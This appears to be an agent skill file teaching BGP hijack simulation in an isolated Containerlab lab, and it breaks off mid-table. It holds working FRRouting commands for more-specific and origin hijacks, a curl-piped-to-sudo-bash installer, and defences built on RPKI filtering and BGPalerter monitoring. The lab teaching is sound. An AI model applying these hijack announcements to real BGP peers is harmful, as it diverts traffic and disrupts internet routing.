exploiting-bgp-hijacking-vulnerabilities

What this skill does

# Exploiting BGP Hijacking Vulnerabilities

## When to Use

- Assessing an organization's exposure to BGP prefix hijacking and route leak attacks
- Testing RPKI (Resource Public Key Infrastructure) deployment and route origin validation effectiveness
- Validating BGP monitoring and alerting systems detect unauthorized route announcements
- Simulating BGP hijacking in isolated lab environments to train network operations teams
- Evaluating ISP prefix filtering and route origin authorization (ROA) configurations

**Do not use** to perform actual BGP hijacking on the live internet, against BGP peers without authorization, or to disrupt real internet routing infrastructure. BGP attacks on production systems are illegal and can cause widespread internet outages.

## Prerequisites

- Isolated BGP lab environment using GNS3, EVE-NG, or Containerlab with virtual routers (FRRouting, BIRD, or Cisco IOS)
- Understanding of BGP path attributes, AS path, prefix announcements, and route selection
- Access to BGP looking glass servers and RPKI validators for monitoring real-world route status
- bgpstream, RIPEstat, and BGPalerter tools for route monitoring
- Written authorization for any testing that involves real AS numbers or prefix announcements

## Workflow

### Step 1: Build an Isolated BGP Lab Environment

```bash
# Install Containerlab for BGP simulation
sudo bash -c "$(curl -sL https://get.containerlab.dev)"

# Create a BGP lab topology file
cat > bgp-lab.clab.yml << 'EOF'
name: bgp-hijack-lab
topology:
  nodes:
    # Legitimate AS (AS65001) announcing 10.0.0.0/24
    legitimate-router:
      kind: linux
      image: frrouting/frr:v8.5.0
      binds:
        - legitimate-frr.conf:/etc/frr/frr.conf
    # Attacker AS (AS65002) that will hijack the prefix
    attacker-router:
      kind: linux
      image: frrouting/frr:v8.5.0
      binds:
        - attacker-frr.conf:/etc/frr/frr.conf
    # Transit provider (AS65000) connecting both
    transit-router:
      kind: linux
      image: frrouting/frr:v8.5.0
      binds:
        - transit-frr.conf:/etc/frr/frr.conf
    # Victim network receiving routes
    victim-router:
      kind: linux
      image: frrouting/frr:v8.5.0
      binds:
        - victim-frr.conf:/etc/frr/frr.conf
  links:
    - endpoints: ["legitimate-router:eth1", "transit-router:eth1"]
    - endpoints: ["attacker-router:eth1", "transit-router:eth2"]
    - endpoints: ["transit-router:eth3", "victim-router:eth1"]
EOF

# Configure legitimate router (AS65001)
cat > legitimate-frr.conf << 'EOF'
frr defaults traditional
hostname legitimate-router
router bgp 65001
 bgp router-id 1.1.1.1
 neighbor 10.0.1.2 remote-as 65000
 address-family ipv4 unicast
  network 10.0.0.0/24
  neighbor 10.0.1.2 activate
 exit-address-family
!
interface eth1
 ip address 10.0.1.1/30
!
interface lo
 ip address 10.0.0.1/24
EOF

# Configure attacker router (AS65002) -- initially not announcing the prefix
cat > attacker-frr.conf << 'EOF'
frr defaults traditional
hostname attacker-router
router bgp 65002
 bgp router-id 2.2.2.2
 neighbor 10.0.2.2 remote-as 65000
 address-family ipv4 unicast
  neighbor 10.0.2.2 activate
 exit-address-family
!
interface eth1
 ip address 10.0.2.1/30
EOF

# Deploy the lab
sudo containerlab deploy -t bgp-lab.clab.yml
```

### Step 2: Verify Legitimate BGP Routing

```bash
# Connect to victim router and verify route to 10.0.0.0/24
docker exec -it clab-bgp-hijack-lab-victim-router vtysh -c "show ip bgp"
docker exec -it clab-bgp-hijack-lab-victim-router vtysh -c "show ip route 10.0.0.0/24"

# Expected: Route via AS65000 AS65001 (legitimate path)
# Verify traceroute follows the legitimate path
docker exec -it clab-bgp-hijack-lab-victim-router traceroute 10.0.0.1

# Check BGP table on transit router
docker exec -it clab-bgp-hijack-lab-transit-router vtysh -c "show ip bgp 10.0.0.0/24"
```

### Step 3: Simulate Prefix Hijack (More-Specific Route)

```bash
# On the attacker router, announce more-specific prefixes
docker exec -it clab-bgp-hijack-lab-attacker-router vtysh << 'VTYSH'
configure terminal
router bgp 65002
 address-family ipv4 unicast
  network 10.0.0.0/25
  network 10.0.0.128/25
 exit-address-family
!
interface lo
 ip address 10.0.0.1/25
 ip address 10.0.0.129/25
exit
end
write memory
VTYSH

# Verify the hijack on the victim router
docker exec -it clab-bgp-hijack-lab-victim-router vtysh -c "show ip bgp 10.0.0.0/24 longer-prefixes"

# The victim should now prefer the /25 routes via the attacker
# because more-specific routes always win in IP routing
docker exec -it clab-bgp-hijack-lab-victim-router vtysh -c "show ip route 10.0.0.1"
# Expected: Route now via AS65000 AS65002 (attacker)
```

### Step 4: Simulate AS Path Prepend and Origin Hijack

```bash
# Origin hijack: Attacker announces the exact /24 prefix
docker exec -it clab-bgp-hijack-lab-attacker-router vtysh << 'VTYSH'
configure terminal
router bgp 65002
 address-family ipv4 unicast
  network 10.0.0.0/24
  no network 10.0.0.0/25
  no network 10.0.0.128/25
 exit-address-family
end
write memory
VTYSH

# Check which route the victim prefers
# With equal prefix length, shortest AS path wins
docker exec -it clab-bgp-hijack-lab-victim-router vtysh -c "show ip bgp 10.0.0.0/24"
# Both routes visible, attacker may win based on AS path length

# Analyze how BGP path selection determines the winner
docker exec -it clab-bgp-hijack-lab-transit-router vtysh -c "show ip bgp 10.0.0.0/24 bestpath-compare"
```

### Step 5: Test RPKI Route Origin Validation

```bash
# Set up RPKI validator (Routinator)
docker run -d --name routinator \
  -p 3323:3323 -p 8323:8323 \
  nlnetlabs/routinator:latest

# Configure transit router to use RPKI validation
docker exec -it clab-bgp-hijack-lab-transit-router vtysh << 'VTYSH'
configure terminal
rpki
 rpki cache 172.17.0.1 3323 preference 1
exit
!
route-map RPKI-FILTER permit 10
 match rpki valid
!
route-map RPKI-FILTER deny 20
 match rpki invalid
!
route-map RPKI-FILTER permit 30
 match rpki notfound
!
router bgp 65000
 address-family ipv4 unicast
  neighbor 10.0.2.1 route-map RPKI-FILTER in
 exit-address-family
end
write memory
VTYSH

# Verify RPKI status
docker exec -it clab-bgp-hijack-lab-transit-router vtysh -c "show rpki prefix-table"
docker exec -it clab-bgp-hijack-lab-transit-router vtysh -c "show ip bgp 10.0.0.0/24"
# Attacker's announcement should be marked as RPKI Invalid if ROA exists
```

### Step 6: Monitor and Detect BGP Anomalies

```bash
# Install BGPalerter for real-time monitoring
npm install -g bgpalerter
bgpalerter generate -o /etc/bgpalerter

# Configure BGPalerter to monitor your prefixes
cat > /etc/bgpalerter/prefixes.yml << 'EOF'
10.0.0.0/24:
  description: Production Network
  asn: 65001
  ignoreMorespecifics: false
  group: production
EOF

# Start monitoring
bgpalerter

# Use bgpstream to query historical routing data
pip3 install pybgpstream

python3 << 'PYEOF'
import pybgpstream

# Query for historical prefix announcements
stream = pybgpstream.BGPStream(
    from_time="2024-03-14 00:00:00",
    until_time="2024-03-15 00:00:00",
    collectors=["route-views2", "rrc00"],
    record_type="updates",
    filter="prefix more 10.0.0.0/24"
)

for rec in stream.records():
    for elem in rec:
        if elem.type == "A":  # Announcement
            print(f"Time: {elem.time}")
            print(f"Prefix: {elem.fields['prefix']}")
            print(f"AS Path: {elem.fields['as-path']}")
            print(f"Peer: {elem.peer_asn}")
            print("---")
PYEOF

# Check RPKI status via RIPEstat
curl -s "https://stat.ripe.net/data/rpki-validation/data.json?resource=AS65001&prefix=10.0.0.0/24" | python3 -m json.tool
```

## Key Concepts

| Term | Definition |
|------|------------|
| **BGP Hijacking** | Unauthorized announcement of IP prefixes by an AS that does not own them, diverting traffic through the attacker's network |
| **More-Specific Hijack** | Announcing longer (more-specific) prefixes than the victim's, which always win in IP routing due to longest-prefix